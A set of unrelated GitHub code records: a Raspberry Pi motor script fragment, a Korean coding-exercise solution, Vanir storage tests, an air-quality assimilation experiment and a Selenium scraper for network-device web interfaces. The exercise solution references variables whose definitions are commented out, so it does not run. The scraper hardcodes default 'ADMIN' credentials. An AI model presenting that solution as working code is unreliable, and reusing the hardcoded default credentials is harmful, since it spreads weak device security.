event.code == btnL1:\n print(\"soltaste L1\")\n GPIO.output(pin29, GPIO.LOW)\n GPIO.output(pin21, GPIO.LOW)\n \n elif event.code == btnL2:\n GPIO.output(pin31, GPIO.LOW)\n GPIO.output(pin19, GPIO.LOW)\n print(\"soltaste L2\")\n \n \n","repo_name":"emanuel99r/rpi","sub_path":"RASPI CODES/motor_mando.py","file_name":"motor_mando.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12562845832","text":"# 다른사람 풀이를 참조하자!\n\ndef solution(name):\n n = len(name)\n combo = False\n combo_n = 0\n max_combo_n = 0\n for a in name:\n if a == 'A':\n combo = True\n combo_n += 1\n elif combo: # 콤보가 깨졌다면\n combo = False\n max_combo_n = max(combo_n, max_combo_n)\n combo_n = 0\n # l_combo = r_combo = 0\n # for i in range(1, n): # 두번째부터 끝까지\n # if name[i] != 'A':\n # break\n # r_combo += 1\n\n # for i in range(n-1, 0, -1): # 마지막부터 두번째까지\n # if name[i] != 'A':\n # break\n # l_combo += 1\n\n answer = n - 1 - max(l_combo, r_combo)\n for a in name:\n dist = abs(ord(a) - ord('A'))\n answer += min(dist, 26-dist)\n return answer\n\n\n# BBAAAAAAAAAAAAAAAAABB -> 이런경우가 예외겠구나!\n","repo_name":"skku-algostudy/algostudy-python","sub_path":"week3/준우/PG#42860 - 조이스틱/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"14303851415","text":"import shutil\r\nimport unittest.mock\r\nimport vanir.log\r\nimport vanir.storage\r\nfrom vanir.exc import VanirException\r\nfrom vanir.storage import pool_drivers\r\nfrom vanir.storage.file import FilePool\r\nfrom vanir.storage.reflink import ReflinkPool\r\nfrom vanir.tests import SystemTestCase, VanirTestCase\r\n\r\n# :pylint: disable=invalid-name\r\n\r\n\r\nclass TestPool(unittest.mock.Mock):\r\n def __init__(self, *args, **kwargs):\r\n super(TestPool, self).__init__(*args, spec=vanir.storage.Pool, **kwargs)\r\n try:\r\n self.name = kwargs['name']\r\n except KeyError:\r\n pass\r\n\r\n def __str__(self):\r\n return 'test'\r\n\r\n def init_volume(self, vm, volume_config):\r\n vol = unittest.mock.Mock(spec=vanir.storage.Volume)\r\n vol.configure_mock(**volume_config)\r\n vol.pool = self\r\n vol.import_data.return_value = '/tmp/test-' + vm.name\r\n return vol\r\n\r\n\r\nclass TestVM(object):\r\n def __init__(self, test, template=None):\r\n self.app = test.app\r\n self.name = test.make_vm_name('appvm')\r\n self.dir_path = '/var/lib/vanir/appvms/' + self.name\r\n self.log = vanir.log.get_vm_logger(self.name)\r\n\r\n if template:\r\n self.template = template\r\n\r\n def is_template(self):\r\n # :pylint: disable=no-self-use\r\n return False\r\n\r\n def is_disposablevm(self):\r\n # :pylint: disable=no-self-use\r\n return False\r\n\r\n\r\nclass TestTemplateVM(TestVM):\r\n dir_path_prefix = vanir.config.system_path['vanir_templates_dir']\r\n\r\n def __init__(self, test, template=None):\r\n super(TestTemplateVM, self).__init__(test, template)\r\n self.dir_path = '/var/lib/vanir/vm-templates/' + self.name\r\n\r\n def is_template(self):\r\n return True\r\n\r\n\r\nclass TestDisposableVM(TestVM):\r\n def is_disposablevm(self):\r\n return True\r\n\r\nclass TestApp(vanir.Vanir):\r\n def __init__(self, *args, **kwargs): # pylint: disable=unused-argument\r\n super(TestApp, self).__init__('/tmp/vanir-test.xml',\r\n load=False, offline_mode=True, **kwargs)\r\n self.load_initial_values()\r\n self.default_pool = self.pools['varlibqubes']\r\n\r\nclass TC_00_Pool(VanirTestCase):\r\n \"\"\" This class tests the utility methods from :mod:``vanir.storage`` \"\"\"\r\n\r\n def setUp(self):\r\n super(TC_00_Pool, self).setUp()\r\n self.basedir_patch = unittest.mock.patch('vanir.config.vanir_base_dir',\r\n '/tmp/vanir-test-basedir')\r\n self.basedir_patch.start()\r\n self.app = TestApp()\r\n\r\n def tearDown(self):\r\n self.basedir_patch.stop()\r\n self.app.close()\r\n del self.app\r\n shutil.rmtree('/tmp/vanir-test-basedir', ignore_errors=True)\r\n super().tearDown()\r\n\r\n def test_000_unknown_pool_driver(self):\r\n # :pylint: disable=protected-access\r\n \"\"\" Expect an exception when unknown pool is requested\"\"\"\r\n with self.assertRaises(VanirException):\r\n self.app.get_pool('foo-bar')\r\n\r\n def test_001_all_pool_drivers(self):\r\n \"\"\" Expect all our pool drivers (and only them) \"\"\"\r\n self.assertCountEqual(\r\n ['linux-kernel', 'lvm_thin', 'file', 'file-reflink'],\r\n pool_drivers())\r\n\r\n def test_002_get_pool_klass(self):\r\n \"\"\" Expect the default pool to be `FilePool` or `ReflinkPool` \"\"\"\r\n # :pylint: disable=protected-access\r\n result = self.app.get_pool('varlibqubes')\r\n self.assertTrue(isinstance(result, FilePool)\r\n or isinstance(result, ReflinkPool))\r\n\r\n def test_003_pool_exists_default(self):\r\n \"\"\" Expect the default pool to exists \"\"\"\r\n self.assertPoolExists('varlibqubes')\r\n\r\n def test_004_add_remove_pool(self):\r\n \"\"\" Tries to adding and removing a pool. \"\"\"\r\n pool_name = 'asdjhrp89132'\r\n\r\n # make sure it's really does not exist\r\n self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n self.assertFalse(self.assertPoolExists(pool_name))\r\n\r\n self.loop.run_until_complete(\r\n self.app.add_pool(name=pool_name,\r\n driver='file',\r\n dir_path='/tmp/asdjhrp89132'))\r\n self.assertTrue(self.assertPoolExists(pool_name))\r\n\r\n self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n self.assertFalse(self.assertPoolExists(pool_name))\r\n\r\n def assertPoolExists(self, pool):\r\n \"\"\" Check if specified pool exists \"\"\"\r\n return pool in self.app.pools.keys()\r\n\r\n def test_005_remove_used(self):\r\n pool_name = 'test-pool-asdf'\r\n\r\n dir_path = '/tmp/{}'.format(pool_name)\r\n pool = self.loop.run_until_complete(\r\n self.app.add_pool(name=pool_name,\r\n driver='file',\r\n dir_path=dir_path))\r\n self.addCleanup(shutil.rmtree, dir_path)\r\n vm = self.app.add_new_vm('StandaloneVM', label='red',\r\n name=self.make_vm_name('vm'))\r\n self.loop.run_until_complete(vm.create_on_disk(pool=pool))\r\n with self.assertRaises(vanir.exc.VanirPoolInUseError):\r\n self.loop.run_until_complete(self.app.remove_pool(pool_name))\r\n","repo_name":"VanirLab/VOS","sub_path":"vanir/tests/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25288457571","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom rls_assimilation.RLSAssimilation import RLSAssimilation\nfrom rls_assimilation.SequentialRLSAssimilation import (\n SequentialRLSAssimilationOneSource,\n SequentialRLSAssimilationTwoSources,\n)\nfrom helpers import (\n plot_data_seq,\n print_metrics_seq,\n get_rmse,\n print_stats_from_array,\n read_data,\n prepare_daily_data,\n)\n\n\nnp.seterr(all=\"raise\")\n\n\ndef run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out):\n is_multi_t = t_in1 != t_out or t_in2 != t_out # multi-temporal data assimilation\n is_one_seq_source = not is_multi_t\n\n assimilator = RLSAssimilation(\n t_in1=t_in1,\n t_in2=t_in2,\n s_in1=s_in1,\n s_in2=s_in2,\n t_out=t_out,\n s_out=s_out,\n )\n if is_one_seq_source:\n seq_assimilator = SequentialRLSAssimilationOneSource()\n else:\n seq_assimilator = SequentialRLSAssimilationTwoSources(\n t_in1=t_in1,\n t_in2=t_in2,\n s_in1=s_in1,\n s_in2=s_in2,\n t_out=t_out,\n s_out=s_out,\n )\n\n if is_one_seq_source:\n source1_col = f\"{variable}\"\n source2_col = f\"{variable}_model\"\n seq_source_col = source1_col if s_out == s_in1 else source2_col\n else:\n source1_col = f\"{variable}_{s_in1}_{t_in1}\"\n source2_col = f\"{variable}_{s_in2}_{t_in2}\"\n seq_source_col = None\n\n assimilated = []\n err_assimilated = []\n seq_assimilated = []\n seq_err_assimilated = []\n\n for k in range(len(df)):\n # Step 1: Obtain raw observations from 2 sources\n latest_observation_source1 = df[source1_col].values[k]\n latest_observation_source2 = df[source2_col].values[k]\n\n # Step 2: Assimilate\n analysis, err_analysis = assimilator.assimilate(\n latest_observation_source1,\n latest_observation_source2,\n )\n assimilated.append(analysis)\n err_assimilated.append(err_analysis)\n\n if is_one_seq_source:\n latest_observation_source = df[seq_source_col][k]\n seq_analysis, seq_err_analysis = seq_assimilator.assimilate(\n latest_observation_source\n )\n else:\n seq_analysis, seq_err_analysis = seq_assimilator.assimilate(\n latest_observation_source1,\n latest_observation_source2,\n )\n\n seq_assimilated.append(seq_analysis)\n seq_err_assimilated.append(seq_err_analysis)\n\n df[\"Assimilated\"] = assimilated\n df[\"Seq_Assimilated\"] = seq_assimilated\n df = df.dropna()\n\n # Step 3: Get metrics\n # Uncertainties\n mean_unc_da = np.mean(err_assimilated)\n mean_unc_seq = np.mean(seq_err_assimilated)\n\n # Get a ratio of mean uncertainties for DA and sequential DA\n try:\n err_seq_da_ratio = mean_unc_seq / mean_unc_da\n except (ZeroDivisionError, FloatingPointError):\n err_seq_da_ratio = 1\n\n # RMSE between values\n if seq_source_col:\n rmse_seq = get_rmse(\n df[\"Seq_Assimilated\"].values,\n df[seq_source_col].values,\n )\n rmse_da = get_rmse(\n df[f\"Assimilated\"].values,\n df[seq_source_col].values,\n )\n try:\n seq_da_ratio = rmse_seq / rmse_da\n except (ZeroDivisionError, FloatingPointError):\n seq_da_ratio = 1\n\n return (\n seq_da_ratio,\n None,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n )\n\n # Compare errors of assimilated from actual hourly reference\n rmse_da_h = get_rmse(\n df[\"Assimilated\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n rmse_seq_h = get_rmse(\n df[\"Seq_Assimilated\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n rmse_dh = get_rmse(\n df[f\"{variable}_{s_out}_daily\"].values,\n df[f\"{variable}_{s_out}_hourly\"].values,\n )\n\n try:\n da_dh_ratio = rmse_da_h / rmse_dh\n except (ZeroDivisionError, FloatingPointError):\n da_dh_ratio = 1\n\n try:\n seq_dh_ratio = rmse_seq_h / rmse_dh\n except (ZeroDivisionError, FloatingPointError):\n seq_dh_ratio = 1\n\n return (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n )\n\n\ndef get_location_by_variable(variable):\n if variable in [\"CO\", \"SO2\"]:\n return \"Madrid (Spain)\"\n if variable in [\"NO2\", \"O3\"]:\n return \"Peristeri (Athens, Greece)\"\n if variable in [\"PM2.5\", \"PM10\"]:\n return \"Paris (France)\"\n\n return \"\"\n\n\ndef test_single_dataset(\n data_path, output_path, get_location_name, t_in1, t_in2, s_in1, s_in2, t_out, s_out\n):\n plotted_n_hours = 168\n\n is_multi_t = t_in1 != t_out or t_in2 != t_out\n\n variables = [\"CO\", \"NO2\", \"PM2.5\", \"SO2\", \"O3\", \"PM10\"]\n\n fig_data, axs_data = plt.subplots(nrows=3, ncols=2, figsize=(25, 25))\n\n for idx, variable in enumerate(variables):\n print(variable)\n if not is_multi_t:\n df = read_data(data_path).iloc[:plotted_n_hours, :]\n (\n seq_da_ratio,\n _,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n else:\n df = prepare_daily_data(variable, data_path).iloc[:plotted_n_hours, :]\n (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n df,\n err_assimilated,\n seq_err_assimilated,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n da_scenario = f\"DA{'3' if not is_multi_t else '4'} ({'Model' if s_out == s_in1 else 'Station'} -> {'Station' if s_out == s_in1 else 'Model'})\"\n seq_scenario = (\n f\"Sequential DA ({'Station' if s_in1 == s_out else 'Model'})\"\n if not is_multi_t\n else f\"Sequential DA4 ({'Model' if s_out == s_in1 else 'Station'} -> {'Station' if s_out == s_in1 else 'Model'})\"\n )\n\n if not is_multi_t:\n source1_col = f\"{variable}\"\n source2_col = f\"{variable}_model\"\n else:\n source1_col = f\"{variable}_{s_in1}_{t_in1}\"\n source2_col = f\"{variable}_{s_in2}_{t_in2}\"\n\n axs_data[idx % 3, idx % 2] = plot_data_seq(\n pd.Series(df[source1_col], index=df.index),\n pd.Series(df[source2_col], index=df.index),\n pd.Series(df[\"Assimilated\"], index=df.index),\n pd.Series(df[\"Seq_Assimilated\"], index=df.index),\n variable,\n axs_data[idx % 3, idx % 2],\n da_scenario,\n seq_scenario,\n get_location_name(variable),\n )\n\n print_metrics_seq(\n df[source1_col].values,\n df[source2_col].values,\n df[\"Assimilated\"].values,\n err_assimilated,\n df[\"Seq_Assimilated\"].values,\n seq_err_assimilated,\n da_scenario,\n seq_scenario,\n )\n\n scenario_id = f\"da{'3' if not is_multi_t else '4'}-{'1' if s_out == 'obs' else '2'}\"\n fig_data.savefig(f\"{output_path}/data-{scenario_id}.png\")\n\n\ndef test_variable_Europe_AQ(\n variable,\n t_in1,\n t_in2,\n s_in1,\n s_in2,\n t_out,\n s_out,\n):\n is_multi_t = t_in1 != t_out or t_in2 != t_out\n data_path_dir = f\"data/Europe_AQ/combined_{variable}\"\n unc_ratios = []\n\n if not is_multi_t:\n seq_da_ratios = []\n for filename in os.listdir(data_path_dir):\n df = read_data(f\"{data_path_dir}/{filename}\")\n (\n seq_da_ratio,\n _,\n err_seq_da_ratio,\n _,\n _,\n _,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n seq_da_ratios.append(seq_da_ratio)\n unc_ratios.append(err_seq_da_ratio)\n\n print_stats_from_array(seq_da_ratios, \"RMSE ratio (Sequential/Non-sequential)\")\n else:\n da_dh_ratios = []\n seq_dh_ratios = []\n for filename in os.listdir(data_path_dir):\n data_path = f\"{data_path_dir}/{filename}\"\n df = prepare_daily_data(variable, data_path)\n (\n da_dh_ratio,\n seq_dh_ratio,\n err_seq_da_ratio,\n _,\n _,\n _,\n ) = run_assimilation(df, variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n da_dh_ratios.append(da_dh_ratio)\n seq_dh_ratios.append(seq_dh_ratio)\n unc_ratios.append(err_seq_da_ratio)\n\n print_stats_from_array(\n da_dh_ratios,\n \"RMSE ratio from hourly reference (Non-sequential assimilated / Daily reference)\",\n )\n print_stats_from_array(\n seq_dh_ratios,\n \"RMSE ratio from hourly reference (Sequential assimilated / Daily reference)\",\n )\n\n print_stats_from_array(unc_ratios, \"MAU ratio (Sequential/Non-Sequential)\")\n\n\ndef generate_tests(is_multi_t, s_out):\n s_in1 = \"obs\"\n s_in2 = \"model\"\n\n t_in1 = \"daily\" if is_multi_t and s_in1 == s_out else \"hourly\"\n t_in2 = \"daily\" if is_multi_t and s_in2 == s_out else \"hourly\"\n t_out = \"hourly\"\n\n print(\n f\"Scales: {'hourly' if not is_multi_t else 'daily to hourly'}, {'model to station' if s_out == 'obs' else 'station to model'}\"\n )\n\n # For Liivalaia (Tallinn, Estonia)\n # print('Liivalaia')\n # data_path = \"data/liivalaia_aq_meas_with_forecast.csv\"\n # get_location_name = lambda _: \"Liivalaia (Tallinn, Estonia)\"\n # test_single_dataset(data_path, 'plots/Liivalaia/Sequential/', get_location_name, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n # For Spain/Greece/Paris dataset use the following data path:\n print(\"Spain/Greece/Paris dataset\")\n data_path = \"data/eu-aq.csv\"\n get_location_name = lambda variable: get_location_by_variable(variable)\n test_single_dataset(\n data_path,\n \"plots/EU/Sequential/\",\n get_location_name,\n t_in1,\n t_in2,\n s_in1,\n s_in2,\n t_out,\n s_out,\n )\n\n # For Europe AQ dataset\n print(\"European AQ\")\n variables = [\"CO\", \"NO2\", \"O3\", \"SO2\", \"PM25\", \"PM10\"]\n for variable in variables:\n print(variable)\n test_variable_Europe_AQ(variable, t_in1, t_in2, s_in1, s_in2, t_out, s_out)\n\n\n# Test 1-source sequential VS 2-source non-sequential (the same temporal scales)\ngenerate_tests(False, \"obs\")\n# generate_tests(False, \"model\")\n\n# Test 2-source non-sequential VS 2-source sequential (different temporal scales)\n# generate_tests(True, \"obs\")\ngenerate_tests(True, \"model\")\n","repo_name":"effie-ms/rls-assimilation","sub_path":"example2.py","file_name":"example2.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"19809664775","text":"'''\r\n@author: Ariz\r\n'''\r\nfrom datetime import datetime\r\nimport threading\r\nimport time\r\nimport sys, os\r\nfrom selenium import webdriver\r\n# from Utils.constants import *\r\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\r\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\r\nif sys.version_info[0] < 3:\r\n from Queue import Queue\r\nelse:\r\n from queue import Queue\r\nif not sys.version_info[0] < 3:\r\n import concurrent.futures\r\n\r\nclass snmpTrap(object):\r\n sleepInterval = 0.5\r\n implicitWait = 20\r\n serverConfig = []\r\n flowPointQueue = Queue()\r\n unReachableIpQueue = Queue()\r\n #utilObj = UtilityClass()\r\n PWD_6200 = \"ADMIN\"\r\n USER_6200 = \"ADMIN\"\r\n THREAD_POOL_SIZE = 5\r\n GECKODRIVER_PATH=\"C:\\\\Users\\\\Ariz Ansari\\\\Documents\\\\QOS\\\\geckodriver\\\\geckodriver.exe\" #\"C:\\\\Users\\\\Vineet\\\\Downloads\\\\geckodriver-v0.21.0-win32\\\\geckodriver.exe\"\r\n sep = os.sep\r\n PROJECT_PATH = \"..\"\r\n REPORTS_COMMON_PATH = os.path.join(PROJECT_PATH, \"Reports\" + sep)\r\n\r\n def __init__(self):\r\n self.date = datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S-%f')[:-3]\r\n self.flowPointQueue.put([\"IP\",\"NeType\", \"Service Name\",\"Service Type\", \"Flow Point\", \"EVS\", \"Interface\", \"FlowPointTemplate\"])\r\n\r\n def getFirefoxDriver(self):\r\n capabilities = webdriver.DesiredCapabilities().FIREFOX\r\n capabilities[\"marionette\"] = True\r\n binary = FirefoxBinary('C:/Program Files/Mozilla Firefox/firefox.exe')\r\n driver = webdriver.Firefox(firefox_binary=binary, capabilities=capabilities,executable_path=self.GECKODRIVER_PATH)#\"C:/Utility/BrowserDrivers/geckodriver.exe\")\r\n return driver\r\n\r\n def getChromeDriver(self):\r\n driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)\r\n return driver\r\n\r\n def logout(self, driver):\r\n driver.switch_to_default_content()\r\n driver.switch_to_frame(driver.find_element_by_name(\"commonHeader\"))\r\n driver.find_element_by_link_text(\"LOGOUT\").click()\r\n\r\n def fetchData(self):\r\n isPythonVersion3 = True\r\n if sys.version_info[0] < 3:\r\n isPythonVersion3 = False\r\n\r\n if isPythonVersion3:\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=self.THREAD_POOL_SIZE) as executor:\r\n for poolList in self.serverConfig:\r\n for poolItem in poolList:\r\n executor.submit(self.executeWorker, poolItem)\r\n print(\"Queue size: \", self.flowPointQueue.qsize())\r\n\r\n else:\r\n for poolList in self.serverConfig:\r\n # executor.submit(self.executeWorker, serverConf)\r\n print('Starting new pool : ' + str(self.THREAD_POOL_SIZE))\r\n threadPoolList = []\r\n for poolItem in poolList:\r\n t = threading.Thread(target=self.executeWorker, args=(poolItem,))\r\n t.start()\r\n threadPoolList.append(t)\r\n for t in threadPoolList:\r\n t.join()\r\n print('pool Ends')\r\n # self.writeDataToFile(os.path.join(self.REPORTS_COMMON_PATH,\"TDMServices\" +self.sep + \"TDMServicesReport\"), self.flowPointQueue)\r\n\r\n def executeWorker(self, serverConf):\r\n if '6200' in serverConf[3]:\r\n self.executeWorker6200(serverConf)\r\n elif serverConf[3] in ['3930', '5160']:\r\n self.executeWorkerOthers(serverConf)\r\n\r\n def executeWorker6200(self, serverConf):\r\n ip = serverConf[0]\r\n driver = self.getFirefoxDriver()\r\n try:\r\n driver.implicitly_wait(self.implicitWait)\r\n loginUrl = \"http://\" + ip + \":20080/EMSRequest/Welcome\"\r\n print(loginUrl)\r\n driver.get(loginUrl)\r\n search_field = driver.find_element_by_name(\"Username\")\r\n search_field.send_keys(serverConf[1])\r\n\r\n search_field = driver.find_element_by_name(\"Password\")\r\n search_field.send_keys(serverConf[2])\r\n submitButton = driver.find_element_by_name(\"Submit\")\r\n submitButton.click()\r\n time.sleep(self.sleepInterval)\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeTocFrame\"))\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"L2 Services\").click()\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"Service Switch-1\").click()\r\n time.sleep(self.sleepInterval)\r\n driver.find_element_by_link_text(\"Services Provisioning\").click()\r\n time.sleep(self.sleepInterval)\r\n self.tdmElineService(driver, serverConf)\r\n time.sleep(self.sleepInterval)\r\n self.tdmElanService(driver, serverConf)\r\n except Exception as e:\r\n print(\"Exception occurred!!!! \\n\",str(e))\r\n itemList = []\r\n itemList.append(ip)\r\n self.unReachableIpQueue.put(itemList)\r\n print(\"Writing to csv\")\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"unReachableIp\"),\r\n self.unReachableIpQueue)\r\n finally:\r\n try:\r\n self.logout(driver)\r\n except:\r\n itemList = []\r\n itemList.append(ip)\r\n self.unReachableIpQueue.put(itemList)\r\n print(\"Writing to csv\")\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"unReachableIp\"), self.unReachableIpQueue)\r\n finally:\r\n time.sleep(self.sleepInterval)\r\n driver.close()\r\n\r\n\r\n def tdmElineService(self, driver, serverConf):\r\n driver.find_element_by_link_text(\"ELINE Services\").click()\r\n time.sleep(self.sleepInterval)\r\n serviceType=\"ELINE\"\r\n driver.switch_to_default_content()\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeBodyFrame\"))\r\n time.sleep(1)\r\n count=0\r\n # rows = driver.find_elements_by_tag_name(\"tr\")\r\n rows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n print(\"Rows found: \", len(rows), \"\\n\", rows)\r\n for row in range(1,len(rows)):\r\n count += 1\r\n serviceName=driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\"+str(count+1)+\"]/td[1]\").text#get_attribute(\"text\")\r\n print(\"Value : \", serviceName)\r\n driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\" + str(count + 1) + \"]/td[1]\").click()\r\n fprows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n fpcount = 0\r\n print(\"FPRows found: \", len(fprows), \"\\n\", fprows)\r\n # if len(fprows) == 2:\r\n # print(\"No Flow points found\")\r\n # continue\r\n for fp in range(1, len(fprows)):\r\n fpcount += 1\r\n fpName = driver.find_element_by_xpath(\r\n \"//html/body/form/table[2]/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\").text\r\n time.sleep(self.sleepInterval)\r\n print(\"FP name: \",fpName)\r\n # driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\").click()\r\n # /html/body/form/table[2]/tbody/tr[2]/th/a\r\n fpDvr = driver.find_element_by_xpath(\"//html/body/form/table[2]/tbody/tr[\" + str(fpcount + 1) + \"]/th/a\")\r\n fpDvr.click()\r\n time.sleep(self.sleepInterval)\r\n temprows = driver.find_elements_by_tag_name(\"tr\")\r\n tempcount = 0\r\n print(\"TempRows found: \", len(temprows), \"\\n\", temprows)\r\n fpDict = {\"EVC\": \"None\", \"Interface\": \"None\", \"FlowPointTemplate\": \"None\"}\r\n fpList = list(fpDict.keys())\r\n for temp in range(len(temprows) ):\r\n\r\n property = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/th\").text\r\n value = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/td\").text\r\n tempcount += 1\r\n # print(\"FP name: \", property, value)\r\n if property.strip() in fpList and len(fpList) != 0:\r\n # valueList.append(value)\r\n fpDict[property] = value\r\n fpList.remove(property.strip())\r\n if len(fpList) == 0 or temp == len(temprows)-3:\r\n driver.find_element_by_partial_link_text(\"Back to \").click()\r\n print(\"Clicked on Back To\")\r\n time.sleep(self.sleepInterval)\r\n break\r\n print([serverConf[0], serverConf[3], serviceName, serviceType, fpName] + [fpDict[\"EVC\"]] + [\r\n fpDict[\"Interface\"]] + [fpDict[\"FlowPointTemplate\"]])\r\n self.flowPointQueue.put(\r\n [serverConf[0], serverConf[3], serviceName, serviceType, fpName] + [fpDict[\"EVC\"]] + [\r\n fpDict[\"Interface\"]] + [fpDict[\"FlowPointTemplate\"]])\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"TDMServicesReport\"),\r\n self.flowPointQueue)\r\n # print(\"FPROWS: \",len(fprows), \"FP: \", fp)\r\n if len(fprows)-1 == fp:\r\n driver.find_element_by_partial_link_text(\"View Data\").click()\r\n print(\"Clicked on View Data\")\r\n time.sleep(self.sleepInterval)\r\n break\r\n driver.switch_to_default_content()\r\n time.sleep(self.sleepInterval)\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeTocFrame\"))\r\n time.sleep(self.sleepInterval)\r\n\r\n def tdmElanService(self, driver, serverConf):\r\n driver.find_element_by_link_text(\"ELAN Services\").click()\r\n time.sleep(self.sleepInterval)\r\n serviceType = \"ELAN\"\r\n print(\"Service Type:\", serviceType)\r\n driver.switch_to_default_content()\r\n driver._switch_to.frame(driver.find_element_by_name(\"nodeBodyFrame\"))\r\n time.sleep(1)\r\n count = 0\r\n # /html/body/form/table[2]/tbody/tr[2]/td[1]/p/a\r\n rows = driver.find_elements_by_xpath(\"//table[2]/tbody/tr\")\r\n print(\"Rows found: \", len(rows), \"\\n\")#, rows)\r\n for row in range(1, len(rows)):\r\n count += 1\r\n serviceName = driver.find_element_by_xpath(\r\n \"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a/b\").text # get_attribute(\"text\")\r\n print(\"Service Name : \", serviceName)\r\n # driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a\").click()\r\n driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(count + 1) + \"]/td/p/a\").click()\r\n fprows = driver.find_elements_by_xpath(\"//table[3]/tbody/tr\")\r\n time.sleep(self.sleepInterval)\r\n print(\"FPRows found: \", len(fprows), \"\\n\", fprows)\r\n\r\n fpcount = 0\r\n #, fprows)\r\n for fp in range(1, len(fprows)):\r\n fpcount += 1\r\n print(\"In FProws\")\r\n fpName = driver.find_element_by_xpath(\r\n \"//html/body/form/table[3]/tbody/tr[\" + str(fp + 2) + \"]/td/p\").text\r\n print(\"FP name: \", fpName)\r\n fpDvr= driver.find_element_by_xpath(\"//html/body/form/table[3]/tbody/tr[\" + str(fp + 2) + \"]/td/p/a\")\r\n fpDvr.click()\r\n\r\n print(\"Finding temp rows: \")\r\n temprows = driver.find_elements_by_tag_name(\"tr\")\r\n tempcount = 0\r\n print(\"TempRows found: \", len(temprows), \"\\n\", temprows)\r\n fpDict = {\"EVC\": \"None\", \"Interface\": \"None\", \"FlowPointTemplate\":\"None\"}\r\n fpList = list(fpDict.keys())\r\n valueList=[]\r\n for temp in range(len(temprows) - 1):\r\n if len(fpList) == 0 or temp == len(temprows)-3:\r\n driver.find_element_by_partial_link_text(\"Back to \").click()\r\n time.sleep(self.sleepInterval)\r\n break\r\n property = driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/th\").text\r\n value = driver.find_element_by_xpath(\"//html/body/form/table/tbody/tr[\" + str(tempcount + 1) + \"]/td\").text\r\n tempcount += 1\r\n # print(\"FP name: \", property, value)\r\n if property.strip() in fpList and len(fpList) != 0:\r\n # valueList.append(value)\r\n fpDict[property]=value\r\n fpList.remove(property.strip())\r\n print([serverConf[0], serverConf[3], serviceName, serviceType, fpName]+[fpDict[\"EVC\"]]+[fpDict[\"Interface\"]]+[fpDict[\"FlowPointTemplate\"]])\r\n self.flowPointQueue.put(\r\n [serverConf[0], serverConf[3], serviceName, serviceType, fpName]+[fpDict[\"EVC\"]]+[fpDict[\"Interface\"]]+[fpDict[\"FlowPointTemplate\"]])\r\n self.writeDataToFile(os.path.join(self.PROJECT_PATH, \"TDMServices\" + self.sep + \"TDMServicesReport\"),\r\n self.flowPointQueue)\r\n if len(fprows)-2 == fp:\r\n driver.find_element_by_partial_link_text(\"View Data\").click()\r\n time.sleep(self.sleepInterval)\r\n break\r\n\r\n def executeWorkerOthers(self, serverConf):\r\n pass\r\n\r\n def writeDataToFile(self, fileName, que):\r\n print(\"Writing to file\")\r\n directory = os.path.dirname(fileName)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n fd = open(fileName + '_' + self.date + '.csv', 'a')\r\n while not que.empty():\r\n d = que.get()\r\n fd.write((',').join(d) + '\\n')\r\n\r\n def readConfig(self, filePath=None, isApi=False):\r\n '''\r\n This method reads the config file and loads data in to python objects\r\n 